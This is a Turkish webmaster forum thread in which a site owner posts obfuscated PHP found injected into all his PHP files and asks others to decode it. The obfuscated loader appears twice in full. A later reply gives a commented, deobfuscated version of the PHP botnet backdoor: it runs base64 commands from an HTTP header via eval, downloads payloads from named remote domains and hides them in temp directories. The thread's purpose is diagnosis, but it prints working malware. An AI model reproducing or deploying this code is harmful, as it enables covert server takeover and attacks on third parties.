0
Kayıt Ol

Bu kodu çözebilen var mı?

5

544

  • 12-06-2013, 08:59:01
    #1
    vBTBilisim
    vBTBilisim
    Üyeliği durduruldu
    Merhaba arkadaşlar bugün ftpde dosyalarımı düzenlerken tüm php dosyalarına

    Alıntı
    <?php /*versio:2.17*/$I1l1=0;if (!function_exists('QO000Q00')){$GLOBALS['I1l1'] = '{D.Y3VybAX2luaXQvYWxsb3dfdXJsX2ZvcGVuFR#VPBMQROf~ aHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cwkaX3NldG9w dASHqR)X2V4ZWMAFY!JndheT1jdXJsgLw=%lb3Nvbi5pbg.?YS 1pbi1hLWNpcmNsZS5jb20HcGhwYWlkZS5jb20cdwDWV8IeOg$} &rCkZGlzcGxheV9lcnJvcnMB*HHZGV0ZXJtaW5hdG9yzx*ZnRw MTM$hMi4xNw DSSWwxbGwxMWxsbElsMQpYmFzZTY0X2RlY29kZQJ{YmFzZTY0X 2VuY29kZQXCSFRUUF9IT1NUNdW5pb24i}Kc2VsZWN0FUkVRVUV TVF9VUkkm_hNMZU0NSSVBUX05BTUUZrEUVVFUllfU1RSSU5HRd Pwqr$;VE1Q&zVEVNUAVE1QRElSSd;~RrdG1wwKLtd3AtY29udG VudC91cGxvYWRzEsd3AtY29udGVudC9jYWNoZQi;PdXBsb2FkX 3RtcF9kaXI(CL3RtcALgEVdmVyc2lvyXYVOqLQ@CS$QLXBocAq SFRUUF9FWEVDUEhQRb3V0b2slSFRUUF9VU0VSX0FHRU5U^isLA QPZ29vZ2xlLHlhaG9vLGJpbmcsbXNuLGFzayxiYWlkdSxjcmF3 bGVyLHlhbmRleAL3BnLnBocD91PQJms9JnQ9cGhwJnA9Yuqhcu JnY9YVZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgi ZUp5VlZ3dHY0a1lRL2lzYmhDSmI4cmsyeGp5YXVnTGxTSU9VNG tEZ3BGTU9XUndzaVhXTGpXelRYQlR4M3pzenUzNlFPTGtXSXNY c3pNNTd2aG1IVzZhZGJmZzJqUGhHYTJ4NHhwTmRHSzJ5T0duby tndmJIcUoxRnNZUnExS0NMWSszV25NOEZ2Qm5zUFBtMkJaakla akhKb3ViRzUyOXNQSmtGNjZUT0F0M1hNdVNBOWN2V01LelF4S3 hxZ2c0UFphYUhuaTJEUVhYbXRPcDcvdFRBNFVobTA1aWJYZ0dz VlBmc3F5cFpXbU93VHB3SDNsc1lRTkY4WmdGUjk5Z1hlQVloRk VZcER6VENvTGROVmpMMGcxbUF6bUVPQkRMUXcyTHpyeUt5amJv Yk9uazVuUnF3YWszUUlQeFpyQ09vNHhIV1ZxS2FJTisyOUtaeV pSRCtDUTlNa3VaTG5BNW9LaUlqeEtOa2VFaTVXaGVIcUdBL3d4 VFVLRjh4alExVVJDSTl0aEFuV295S0VKUUZ0NEd4U2FyZ0dkcW 9hWTZIdHZxcU5BcFFacFNZN0RMeGV6R3Y1MEg4TTlnLzlOVkc0 TnF0L1FQQlYrUGhwOUhNMk83QXQ4L1pKeU41b3ZaWkQ0YlR1Nn U0SUlxc3ZmNUwvM0paSFE1bjQvL0h2bUx1Y0ZjaW9FLzlWWDBa RGp5ZXlocWZVaEVzQlp4eWl1bm1BKysyMmZQbXJvTVdTakZsTD YySUNRUTVtT1pWdUxKMDBxdFFqMkF5cmRwdlA0UjczbFUxbjdQ TWloRnZtL2xqU0NrMFdoQjNqOVNET1JQMUNsbnAvMEpMbTMzQj ZvZjFjQ052MFp6OXFJeWRUeC9XajE3YUFuUDJQVjhmdnViYlZy ZmttL1JkWnhtdndPYk5PMklSdzBTanRLeDgyNnZid1AvcmxJL2 pvV05ZdUw1bDlIc2J1eFBhblF2VXA1OEdqNUEwNkJ3S1l5RTV3 cWVIaEVOemo0QUlPV2Z6czdQbWZZS2NOaW5rdndIV0ZOR3lzU0 lRODlXakxGYlBjS2l3VmJsdThBbnZBUWY4SkwvM0l0NHc3VkdZ YU9SaXdTK1E0UVFvN2p2cldYWjBPR3UvaDU4U0NkK0liYlk5YU JsbUNTcjV3b09PUzYxVnFYWjdEWmlrM055MU1XdWRyR3pDalI5 U3NJTUM5ZENMcU5KdWJNZ0NxcDh3T3d4d0pjcU9zbFV5dXQxQ2 VtQWZiQlZndVNWUXRCRk5WWklVYjRVK3VOREJnbFhXQ1dvbUtH V3B5Q1NyeC9qaXUxOUtCWkhOeFZqcFlyNkxsV1J1bWhTL0JxVX BUZUkzcklBbXUyK0xzdGVUclVLdFFWNFpuY1U0RlBzaGZCS2N0 dVZjSWRBS0d5N1FuSGJ4WlFCeXJoQzZhRENIcEhFSzFLdmxaUG dKMWhla2h5ckpGRWN2ZGNRV2xCTUw4MlNMQmJ4RTArMFFUTzRH ODJnbGU1TFVhMFdnU2tXMmpaTytHcjlDSGtOc0tGWHFacUt3dn V6akRybUhVVHU0MVJUaDJXK0hZY2lnRkNHRXU3VjlhVlhnMmY1 VUhwWEZrYXo5OTlrSGNFcTdTeE1xWFhldW9qUmg2cGV5cEg3UH Azdyt5MjU2MG95UW1adENQc09sY1h5VitMTjZnNWcyMWlWTU9B K2tpaDdRYmFhUUNqeDhyVFczU3I4Ukl4Q3hCTGVZTGR4ODJGZ3 FybzBGYzZxWXBTMUFsTnA2bTNDSkZvQjhBWEIxZmhtRkFTNitY azhnMkhuejc2Q3R0dmhiQWlQTk83OEtzclV1ZERHSWQzV2wwWX RzVVZibHlTT0psL2V1WFpLd1d6MzZpbTVOT1ZIMmZ0dFhMWGFl aDNGeGZqWGs3cUlXaTBndmQzblhPcTh2bDVGVFZmcU45aEpDNm tZcVNhQzBsVzljNmFtdmpxVVN5ayttbDV0c09WZW1RWUluNnZ2 dU5aV2JrclQ1ZTZGaHhmc08rai9VWXlEYkxmMzN2am5ZaVFSRU dXTktCVkZsaG80czRPdndYQXh2MjRzUFUreDVZQ2J3K2RBQVhN cDFuRXdRVVlPZnhXRk5HbFFJU0ZtaFNCeHNWaEdiQnlYbmtMQ3 VsWnpPN1pxTlJ3cC9KK1Z5RytCakYrWTErM0pVaWhQRUdBZG5R WU9iTVNaWnRGakhuRDVEZ0VSSkYxWmZGZy95cC8wS3JBV2h3MF A0bWpOODBNSmFhcjFvRk1Ic1BieGFJMGpXeDNKVFZGbGJQQXhM cnU5RHIwNW5PQnl2am9VWEIyTFVsbHhxbU5qTWVMYmhhdzhnRX o3TldxVENVWkJQZk84SzFxVEpWdlZWVldkZ2hhWFVnY2hZbHRW RU96bUphWFh4eURucFZVaEVLTFYxVUFYZ1pDdVVOWFF0TU1sR1 JSV1h1VHdETGFoOGwzdTRsVktqcWVWRDk5L0FUNHQ0SFE9Iikp KTstbcHJlZ19yZXBsYWNlQh';function QO000Q00($a, $b){$c=$GLOBALS['I1l1']; $d=pack('H*','6261736536345f64656'.'36f6465'); return $d(substr($c, $a, $b));};$IIIl1IIlI = QO000Q00(3266, 16);$IIIl1IIlI("/QOOQOOO00/e", QO000Q00(717, 2547), "QOOQOOO00");};?>
    Kodunun eklendiğini gördüm daha onceden böyle bir kod ekli değildi php dosyalarında çözebilen varsa çok makbule geçer
  • 12-06-2013, 09:28:53
    #2
    WapZap
    WapZap
    Üyeliği durduruldu
    vBTBilisim adlı üyeden alıntı: mesajı görüntüle
    Merhaba arkadaşlar bugün ftpde dosyalarımı düzenlerken tüm php dosyalarına



    Kodunun eklendiğini gördüm daha onceden böyle bir kod ekli değildi php dosyalarında çözebilen varsa çok makbule geçer
    php tagina koyarmisiniz quoteden cikarip? mobilden kopyalayamiyorum.
  • 12-06-2013, 09:31:25
    #3
    erkutadakli
    erkutadakli
    vBTBilisim adlı üyeden alıntı: mesajı görüntüle
    Merhaba arkadaşlar bugün ftpde dosyalarımı düzenlerken tüm php dosyalarına



    Kodunun eklendiğini gördüm daha onceden böyle bir kod ekli değildi php dosyalarında çözebilen varsa çok makbule geçer

    İframe Virüsü Sanırsam Kodlarda Eset Uyarı veriyor
  • 12-06-2013, 09:39:23
    #4
    UMUT
    UMUT
    WapZap adlı üyeden alıntı: mesajı görüntüle
    php tagina koyarmisiniz quoteden cikarip? mobilden kopyalayamiyorum. 
    <?php /*versio:2.17*/$I1l1=0;if (!function_exists('QO000Q00')){$GLOBALS['I1l1'] = '{D.Y3VybAX2luaXQvYWxsb3dfdXJsX2ZvcGVuFR#VPBMQROf~ aHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cwkaX3NldG9w dASHqR)X2V4ZWMAFY!JndheT1jdXJsgLw=%lb3Nvbi5pbg.?YS 1pbi1hLWNpcmNsZS5jb20HcGhwYWlkZS5jb20cdwDWV8IeOg$} &rCkZGlzcGxheV9lcnJvcnMB*HHZGV0ZXJtaW5hdG9yzx*ZnRw MTM$hMi4xNw DSSWwxbGwxMWxsbElsMQpYmFzZTY0X2RlY29kZQJ{YmFzZTY0X 2VuY29kZQXCSFRUUF9IT1NUNdW5pb24i}Kc2VsZWN0FUkVRVUV TVF9VUkkm_hNMZU0NSSVBUX05BTUUZrEUVVFUllfU1RSSU5HRd Pwqr$;VE1Q&zVEVNUAVE1QRElSSd;~RrdG1wwKLtd3AtY29udG VudC91cGxvYWRzEsd3AtY29udGVudC9jYWNoZQi;PdXBsb2FkX 3RtcF9kaXI(CL3RtcALgEVdmVyc2lvyXYVOqLQ@CS$QLXBocAq SFRUUF9FWEVDUEhQRb3V0b2slSFRUUF9VU0VSX0FHRU5U^isLA QPZ29vZ2xlLHlhaG9vLGJpbmcsbXNuLGFzayxiYWlkdSxjcmF3 bGVyLHlhbmRleAL3BnLnBocD91PQJms9JnQ9cGhwJnA9Yuqhcu JnY9YVZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgi ZUp5VlZ3dHY0a1lRL2lzYmhDSmI4cmsyeGp5YXVnTGxTSU9VNG tEZ3BGTU9XUndzaVhXTGpXelRYQlR4M3pzenUzNlFPTGtXSXNY c3pNNTd2aG1IVzZhZGJmZzJqUGhHYTJ4NHhwTmRHSzJ5T0duby tndmJIcUoxRnNZUnExS0NMWSszV25NOEZ2Qm5zUFBtMkJaakla akhKb3ViRzUyOXNQSmtGNjZUT0F0M1hNdVNBOWN2V01LelF4S3 hxZ2c0UFphYUhuaTJEUVhYbXRPcDcvdFRBNFVobTA1aWJYZ0dz VlBmc3F5cFpXbU93VHB3SDNsc1lRTkY4WmdGUjk5Z1hlQVloRk VZcER6VENvTGROVmpMMGcxbUF6bUVPQkRMUXcyTHpyeUt5amJv Yk9uazVuUnF3YWszUUlQeFpyQ09vNHhIV1ZxS2FJTisyOUtaeV pSRCtDUTlNa3VaTG5BNW9LaUlqeEtOa2VFaTVXaGVIcUdBL3d4 VFVLRjh4alExVVJDSTl0aEFuV295S0VKUUZ0NEd4U2FyZ0dkcW 9hWTZIdHZxcU5BcFFacFNZN0RMeGV6R3Y1MEg4TTlnLzlOVkc0 TnF0L1FQQlYrUGhwOUhNMk83QXQ4L1pKeU41b3ZaWkQ0YlR1Nn U0SUlxc3ZmNUwvM0paSFE1bjQvL0h2bUx1Y0ZjaW9FLzlWWDBa RGp5ZXlocWZVaEVzQlp4eWl1bm1BKysyMmZQbXJvTVdTakZsTD YySUNRUTVtT1pWdUxKMDBxdFFqMkF5cmRwdlA0UjczbFUxbjdQ TWloRnZtL2xqU0NrMFdoQjNqOVNET1JQMUNsbnAvMEpMbTMzQj ZvZjFjQ052MFp6OXFJeWRUeC9XajE3YUFuUDJQVjhmdnViYlZy ZmttL1JkWnhtdndPYk5PMklSdzBTanRLeDgyNnZid1AvcmxJL2 pvV05ZdUw1bDlIc2J1eFBhblF2VXA1OEdqNUEwNkJ3S1l5RTV3 cWVIaEVOemo0QUlPV2Z6czdQbWZZS2NOaW5rdndIV0ZOR3lzU0 lRODlXakxGYlBjS2l3VmJsdThBbnZBUWY4SkwvM0l0NHc3VkdZ YU9SaXdTK1E0UVFvN2p2cldYWjBPR3UvaDU4U0NkK0liYlk5YU JsbUNTcjV3b09PUzYxVnFYWjdEWmlrM055MU1XdWRyR3pDalI5 U3NJTUM5ZENMcU5KdWJNZ0NxcDh3T3d4d0pjcU9zbFV5dXQxQ2 VtQWZiQlZndVNWUXRCRk5WWklVYjRVK3VOREJnbFhXQ1dvbUtH V3B5Q1NyeC9qaXUxOUtCWkhOeFZqcFlyNkxsV1J1bWhTL0JxVX BUZUkzcklBbXUyK0xzdGVUclVLdFFWNFpuY1U0RlBzaGZCS2N0 dVZjSWRBS0d5N1FuSGJ4WlFCeXJoQzZhRENIcEhFSzFLdmxaUG dKMWhla2h5ckpGRWN2ZGNRV2xCTUw4MlNMQmJ4RTArMFFUTzRH ODJnbGU1TFVhMFdnU2tXMmpaTytHcjlDSGtOc0tGWHFacUt3dn V6akRybUhVVHU0MVJUaDJXK0hZY2lnRkNHRXU3VjlhVlhnMmY1 VUhwWEZrYXo5OTlrSGNFcTdTeE1xWFhldW9qUmg2cGV5cEg3UH Azdyt5MjU2MG95UW1adENQc09sY1h5VitMTjZnNWcyMWlWTU9B K2tpaDdRYmFhUUNqeDhyVFczU3I4Ukl4Q3hCTGVZTGR4ODJGZ3 FybzBGYzZxWXBTMUFsTnA2bTNDSkZvQjhBWEIxZmhtRkFTNitY azhnMkhuejc2Q3R0dmhiQWlQTk83OEtzclV1ZERHSWQzV2wwWX RzVVZibHlTT0psL2V1WFpLd1d6MzZpbTVOT1ZIMmZ0dFhMWGFl aDNGeGZqWGs3cUlXaTBndmQzblhPcTh2bDVGVFZmcU45aEpDNm tZcVNhQzBsVzljNmFtdmpxVVN5ayttbDV0c09WZW1RWUluNnZ2 dU5aV2JrclQ1ZTZGaHhmc08rai9VWXlEYkxmMzN2am5ZaVFSRU dXTktCVkZsaG80czRPdndYQXh2MjRzUFUreDVZQ2J3K2RBQVhN cDFuRXdRVVlPZnhXRk5HbFFJU0ZtaFNCeHNWaEdiQnlYbmtMQ3 VsWnpPN1pxTlJ3cC9KK1Z5RytCakYrWTErM0pVaWhQRUdBZG5R WU9iTVNaWnRGakhuRDVEZ0VSSkYxWmZGZy95cC8wS3JBV2h3MF A0bWpOODBNSmFhcjFvRk1Ic1BieGFJMGpXeDNKVFZGbGJQQXhM cnU5RHIwNW5PQnl2am9VWEIyTFVsbHhxbU5qTWVMYmhhdzhnRX o3TldxVENVWkJQZk84SzFxVEpWdlZWVldkZ2hhWFVnY2hZbHRW RU96bUphWFh4eURucFZVaEVLTFYxVUFYZ1pDdVVOWFF0TU1sR1 JSV1h1VHdETGFoOGwzdTRsVktqcWVWRDk5L0FUNHQ0SFE9Iikp KTstbcHJlZ19yZXBsYWNlQh';function QO000Q00($a, $b){$c=$GLOBALS['I1l1']; $d=pack('H*','6261736536345f64656'.'36f6465'); return $d(substr($c, $a, $b));};$IIIl1IIlI = QO000Q00(3266, 16);$IIIl1IIlI("/QOOQOOO00/e", QO000Q00(717, 2547), "QOOQOOO00");};?>
  • 12-06-2013, 09:56:56
    #5
    WapZap
    WapZap
    Üyeliği durduruldu
    vBTBilisim adlı üyeden alıntı: mesajı görüntüle
    Merhaba arkadaşlar bugün ftpde dosyalarımı düzenlerken tüm php dosyalarına



    Kodunun eklendiğini gördüm daha onceden böyle bir kod ekli değildi php dosyalarında çözebilen varsa çok makbule geçer
    hocam sitede virus var. ben cozemedim kopyalayamadigimdan, bi php dosyasina atip zippyshareye yuklerseniz kodlari inceleyecegim
  • 13-06-2013, 16:44:57
    #6
    tiklagel
    tiklagel
    bahsi geçen kod php botnettir
    serveriniz üzerinden istedikleri yere atak yaparlar 

    <?php
// "!defined('determinator') == "include_once" for sneaky people.
if (!defined("determinator")){
    function determinator_feof($file_pointer, &$now = NULL) {
        // Assigning a value to $now in this function changes
        // the value of whatever variable the calling function
        // passed in. Functions with side effects... huzzah!
        $now = microtime(true);
        
        // Have we reached the end of the file?
        return feof($file_pointer);
    }
    
    function getfile($domain, $path){
        // Try to change their PHP config to allow file_get_contents to
        // grab files via HTTP.        
        @ini_set('allow_url_fopen', 1);
        
        // If we can use file_get_contents to grab our payload, do that.
        if (@ini_get('allow_url_fopen') == '1') { 
            $file=@file_get_contents('http://' . $domain . $path. '&way=file_get_contents');
            return $file;
            
        // Otherwise see if curl is installed and use that instead.
        } elseif (function_exists('curl_init')){
            $curl_obj = @curl_init();
            @curl_setopt($curl_obj, CURLOPT_URL, 'http://' . $domain . $path. '&way=curl';
            @curl_setopt($curl_obj, CURLOPT_HEADER,false);
            @curl_setopt($curl_obj, CURLOPT_RETURNTRANSFER,true);
            @curl_setopt($curl_obj, CURLOPT_CONNECTTIMEOUT, 5);
            $file = @curl_exec($curl_obj);
            @curl_close($curl_obj);
            
            if (empty($file)){
                $file = '';
            }
            
            return $file;
            
        // No curl or file_get_contents? *sigh*
        // Then just use sockets.
        } else {
            $socket = @fsockopen($domain, 80, $errno, $errstr, 5);
            
            if ($socket) {
                $file = '';
                $now = NULL;
                @fputs($socket, "GET {$path}&way=socket HTTP/1.0\r\nHost: {$domain}\r\n");
                $user_agent = PHP_OS.'/'.PHP_VERSION;
                @fputs($socket, "User-Agent: {$user_agent}\r\n\r\n");
                
                // As long as we haven't reached the end of the file
                // and checking to see if we've reached the end of the
                // file takes less than two milliseconds, read in more
                // of the file.
                while(!determinator_feof($socket, $now)
                && (microtime(true) - $now) < 2){
                    $file .= @fgets($socket, 128);
                }
                
                @fclose($socket);
                
                // Remove the response headers and return the file.
                $file_parts = explode("\r\n\r\n", $file);
                unset($file_parts[0]);
                return implode("\r\n\r\n", $file_parts);
            }
        }
    }
    
    // These are the domains we'll be grabbing our payloads from.
    $domains = Array('oson.in', 'a-in-a-circle.com', 'phpaide.com');
    
    function write($filename,$data){
    // Writes data to a file, suppressing any errors with @.
    
        if ($file=@fopen($filename,'w')){
            @fwrite($file,$data);
            @fclose($file);
        }
    }
    
    function output($message_type, $message){
    // Sends a response to our botnet overlords.
        echo 'Y_'.$message_type.':'.$message."\r\n";
    }
    
    // Try to change PHP's config to suppress error messages and
    // suppress any resulting error message with @.
    @ini_set('display_errors', 0);
    
    // This line works with the first line to allow us to spew our
    // vile botnet code all over the victim's files without having to
    // worry about it accidentally running twice. It's a sneaky person's
    // "include_once" for inline code.
    define('determinator', 1);
    
    // Defining some variables we'll be using later.
    $ftp13='ftp13';
    $version='2.18';
    $QOO00Q='QQQOQ0OQ0OOQOQO';
    $base64_decode='base64_decode';
    $base64_encode='base64_encode';
    $http_host='http://';
    $http_host.=strtolower(@$_SERVER['HTTP_HOST']);
    
    // Wipe out all $_GET request parameters that contain
    // "union" or "select." (Not sure why, but the botnet
    // overlords surely have their reasons.)
    foreach ($_GET as $arg=>$value){
        if (strpos($value,'union')){
            $_GET[$arg]='';
        } elseif (strpos($value,'select')){
            $_GET[$arg]='';
        }
    }
    
    // Try setting the request's URI to our script name and then appending
    // the query string to the end of it.
    if(!isset($_SERVER['REQUEST_URI'])) {
        $_SERVER['REQUEST_URI'] = @$_SERVER['SCRIPT_NAME'];
        
        if(@$_SERVER['QUERY_STRING']) {
            $_SERVER['REQUEST_URI'] .= '?' . @$_SERVER['QUERY_STRING'];
        }
    }
    
    // Try setting $request_uri to the server's request uri, whether or not
    // we were successful in mutating it above. If we succeed in that...
    if ($request_uri=$http_host.@$_SERVER['REQUEST_URI']){
        
        // ...then calculate the server's botnet name and find a temp
        // directory we can write to!
        $exploited_server_id=@md5($http_host.$version.PHP_OS.$QOO00Q);
        $writeable_dir=dirname(__FILE__).DIRECTORY_SEPARATOR;
        $tmp_dirs = Array(
            '/tmp/.font-unix',
            @$_SERVER['TMP'],
            @$_SERVER['TEMP'],
            @$_ENV['TMP'],
            @$_ENV['TMPDIR'],
            @$_ENV['TEMP'],
            $writeable_dir.'tmp',
            $writeable_dir.'wp-content/uploads',
            $writeable_dir.'wp-content/cache',
            @ini_get('upload_tmp_dir'),
            '/tmp', 
        );
        
        foreach ($tmp_dirs as $tmp_dir){
            if (!empty($tmp_dir)){
                $tmp_dir.=DIRECTORY_SEPARATOR;
                
                if (@is_writable($tmp_dir)){
                    $writeable_dir = $tmp_dir;
                    break;
                }
            }
        }
        
        // We're going to save the payload from our botnet overlords
        // as a hidden file in the writeable temp directory we found
        // above, naming it after our own botnet name. (Probably because
        // that'll make it harder for people to figure out if they're infected.)
        $payload_file=$writeable_dir.'.'.$exploited_server_id;
        
        // Are our botnet overlords asking for our status?
        if (@$_SERVER["HTTP_Y_AUTH"]==$exploited_server_id){
            
            // Tell them what version of the slave code we're running.
            echo "\r\n";
            @output('versio', $version.'-'.$ftp13.'-php');
            
            // Do they come with commands? Execute them!
            if ($command=$base64_decode(@$_SERVER['HTTP_EXECPHP'])){
                @eval($command);
                echo "\r\n";
                @output('out', 'ok');
            }
            
            // Our duty is done.
            exit(0);
        }
        
        // If we already have a payload file, execute it.
        if (@is_file($payload_file)){
            @touch($payload_file);
            @include_once($payload_file);
            
        // Otherwise check to see if we're being spidered by a search engine.
        // If we are, let our botnet overlords know so they can send us a
        // payload ASAP. We're mostly interested in websites people will be
        // going to, and our botnet overlords seem to think a visit from a
        // search engine spider is a pretty good indication that outside
        // traffic will be forthcoming.
        } else {
            $request_uri=@urlencode($request_uri);
            $user_agent = @strtolower(@$_SERVER['HTTP_USER_AGENT']);
            
            foreach (explode(',', 'google,yahoo,bing,msnbot,ask,baidu,yandex') as $search_engine){
                if (strpos($user_agent, $search_engine)!==False){
                    if (@touch($payload_file)){
                        $file_uri = '/pg.php?u='.$request_uri.'&k='.$exploited_server_id.'&t=php&p='.$ftp13.'&v='.$version;
                        $file_contents = getfile($domains[0], $file_uri);
                        
                        // Create an empty payload file. We don't want to
                        // notify our botnet overlords more than once!
                        // They get grumpy when we do that. D:)
                        @touch($payload_file);
                    }
                    
                    // We don't need to check for the rest of the search
                    // engine names in the request's HTTP_USER_AGENT once
                    // we've found one.
                    break;
                }
            }
        }
    }
}
?>